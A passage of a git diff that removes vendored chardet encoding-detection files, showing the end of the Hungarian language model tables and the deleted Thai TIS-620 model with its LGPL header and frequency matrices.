-3,1,1,1,2,2,2,1,0,1,2,3,3,2,0,0,0,2,1,1,1,2,1,1,1,0,1,1,1,0,0,0, -1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,2,1,1,1,1,1,1,0,1,1,1,0,0,1,1, -3,2,2,1,0,0,1,1,2,2,0,3,0,1,2,1,1,0,0,1,1,1,0,1,1,1,1,0,2,1,1,1, -2,2,1,1,1,2,1,2,1,1,1,1,1,1,1,2,1,1,1,2,3,1,1,1,1,1,1,1,1,1,0,1, -2,3,3,0,1,0,0,0,3,3,1,0,0,1,2,2,1,0,0,0,0,2,0,0,1,1,1,0,2,1,1,1, -2,1,1,1,1,1,1,2,1,1,0,1,1,0,1,1,1,0,1,2,1,1,0,1,1,1,1,1,1,1,0,1, -2,3,3,0,1,0,0,0,2,2,0,0,0,0,1,2,2,0,0,0,0,1,0,0,1,1,0,0,2,0,1,0, -2,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1, -3,2,2,0,1,0,1,0,2,3,2,0,0,1,2,2,1,0,0,1,1,1,0,0,2,1,0,1,2,2,1,1, -2,1,1,1,1,1,1,2,1,1,1,1,1,1,0,2,1,0,1,1,0,1,1,1,0,1,1,2,1,1,0,1, -2,2,2,0,0,1,0,0,2,2,1,1,0,0,2,1,1,0,0,0,1,2,0,0,2,1,0,0,2,1,1,1, -2,1,1,1,1,2,1,2,1,1,1,2,2,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1, -1,2,3,0,0,0,1,0,3,2,1,0,0,1,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,2,1, -1,1,0,0,0,1,0,1,1,1,1,1,2,0,0,1,0,0,0,2,0,0,1,1,1,1,1,1,1,1,0,1, -3,0,0,2,1,2,2,1,0,0,2,1,2,2,0,0,0,2,1,1,1,0,1,1,0,0,1,1,2,0,0,0, -1,2,1,2,2,1,1,2,1,2,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,0,0,1, -1,3,2,0,0,0,1,0,2,2,2,0,0,0,2,2,1,0,0,0,0,3,1,1,1,1,0,0,2,1,1,1, -2,1,0,1,1,1,0,1,1,1,1,1,1,1,0,2,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1, -2,3,2,0,0,0,1,0,2,2,0,0,0,0,2,1,1,0,0,0,0,2,1,0,1,1,0,0,2,1,1,0, -2,1,1,1,1,2,1,2,1,2,0,1,1,1,0,2,1,1,1,2,1,1,1,1,0,1,1,1,1,1,0,1, -3,1,1,2,2,2,3,2,1,1,2,2,1,1,0,1,0,2,2,1,1,1,1,1,0,0,1,1,0,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,0,0,0,0,0,2,2,0,0,0,0,2,2,1,0,0,0,1,1,0,0,1,2,0,0,2,1,1,1, -2,2,1,1,1,2,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,1,1,0,1,2,1,1,1,0,1, -1,0,0,1,2,3,2,1,0,0,2,0,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0, -1,2,1,2,1,2,1,1,1,2,0,2,1,1,1,0,1,2,0,0,1,1,1,0,0,0,0,0,0,0,0,0, -2,3,2,0,0,0,0,0,1,1,2,1,0,0,1,1,1,0,0,0,0,2,0,0,1,1,0,0,2,1,1,1, -2,1,1,1,1,1,1,2,1,0,1,1,1,1,0,2,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1, -1,2,2,0,1,1,1,0,2,2,2,0,0,0,3,2,1,0,0,0,1,1,0,0,1,1,0,1,1,1,0,0, -1,1,0,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,2,1,1,1,0,0,1,1,1,0,1,0,1, -2,1,0,2,1,1,2,2,1,1,2,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,0,0, -1,2,2,2,2,2,1,1,1,2,0,2,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,1,0, -1,2,3,0,0,0,1,0,2,2,0,0,0,0,2,2,0,0,0,0,0,1,0,0,1,0,0,0,2,0,1,0, -2,1,1,1,1,1,0,2,0,0,0,1,2,1,1,1,1,0,1,2,0,1,0,1,0,1,1,1,0,1,0,1, -2,2,2,0,0,0,1,0,2,1,2,0,0,0,1,1,2,0,0,0,0,1,0,0,1,1,0,0,2,1,0,1, -2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,0,1,1,1,1,1,0,1, -1,2,2,0,0,0,1,0,2,2,2,0,0,0,1,1,0,0,0,0,0,1,1,0,2,0,0,1,1,1,0,1, -1,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,1,0,0,0,1, -1,0,0,1,0,1,2,1,0,0,1,1,1,2,0,0,0,1,1,0,1,0,1,1,0,0,1,0,0,0,0,0, -0,2,1,2,1,1,1,1,1,2,0,2,0,1,1,0,1,2,1,0,1,1,1,0,0,0,0,0,0,1,0,0, -2,1,1,0,1,2,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,2,1,0,1, -2,2,1,1,1,1,1,2,1,1,0,1,1,1,1,2,1,1,1,2,1,1,0,1,0,1,1,1,1,1,0,1, -1,2,2,0,0,0,0,0,1,1,0,0,0,0,2,1,0,0,0,0,0,2,0,0,2,2,0,0,2,0,0,1, -2,1,1,1,1,1,1,1,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1, -1,1,2,0,0,3,1,0,2,1,1,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,0, -1,2,1,0,1,1,1,2,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0, -2,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,2,0,0,0, -2,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,2,1,1,0,0,1,1,1,1,1,0,1, -2,1,1,1,2,1,1,1,0,1,1,2,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,0,1,1,1,1,1,0,0,1,1,2,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,0,0, -1,2,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0, -2,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,1,1,1,2,0,0,1,0,0,1,0,1,0,0,0, -0,1,1,1,1,1,1,1,1,2,0,1,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,1,0,0,2,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0, -0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -0,0,0,1,0,0,0,0,0,0,1,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,1,1,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0, -2,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0, -) - -Latin2HungarianModel = { \ - 'charToOrderMap': Latin2_HungarianCharToOrderMap, - 'precedenceMatrix': HungarianLangModel, - 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, - 'charsetName': "ISO-8859-2" -} - -Win1250HungarianModel = { \ - 'charToOrderMap': win1250HungarianCharToOrderMap, - 'precedenceMatrix': HungarianLangModel, - 'mTypicalPositiveRatio': 0.947368, - 'keepEnglishLetter': constants.True, - 'charsetName': "windows-1250" -} diff --git a/chardet/chardet/langhungarianmodel.pyc b/chardet/chardet/langhungarianmodel.pyc deleted file mode 100644 index cf25b16..0000000 Binary files a/chardet/chardet/langhungarianmodel.pyc and /dev/null differ diff --git a/chardet/chardet/langthaimodel.py b/chardet/chardet/langthaimodel.py deleted file mode 100644 index eba92d0..0000000 --- a/chardet/chardet/langthaimodel.py +++ /dev/null @@ -1,200 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# The following result for thai was collected from a limited sample (1M). - -# Character Mapping Table: -TIS620CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40 -188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50 -253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60 - 96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70 -209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222, -223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235, -236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57, - 49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54, - 45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63, - 22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244, - 11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247, - 68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 92.6386% -# first 1024 sequences:7.3177% -# rest sequences: 1.0230% -# negative sequences: 0.0436% -ThaiLangModel = ( \ -0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3, -0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2, -3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3, -0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1, -3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2, -3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1, -3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2, -3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1, -3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1, -3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1, -2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1, -3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1, -0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0, -3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1, -0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2, -1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0, -3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3, -3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0, -1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2, -0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3, -0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0, -3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1, -2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0, -3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2, -0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2, -3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, -3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0, -2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2, -3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1, -2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1, -3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1, -3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0, -3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1, -3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1, -3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1, -1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2, -0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3, -0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1, -3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0, -3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1, -1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0, -3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1, -3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2, -0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0, -0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0, -1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1, -1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1, -3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1, -0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0, -3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0, -0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1, -0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0, -0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1, -0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1, -0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0, -0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1, -0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0, -3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0, -0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0, -0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0, -3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1, -2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1, -0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0, -3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0, -0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0, -1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0, -1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0, -1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -) - -TIS620ThaiModel = { \ - 'charToOrderMap': TIS620CharToOrderMap, - 'precedenceMatrix': ThaiLangModel, - 'mTypicalPositiveRatio': 0.926386, - 'keepEnglishLetter': False, - 'charsetName': "TIS-620" -} diff --git a/chardet/chardet/langthaimodel.py.bak b/chardet/chardet/langthaimodel.py.bak deleted file mode 100644 index 96ec054..0000000 --- a/chardet/chardet/langthaimodel.py.bak +++ /dev/null @@ -1,200 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# The following result for thai was collected 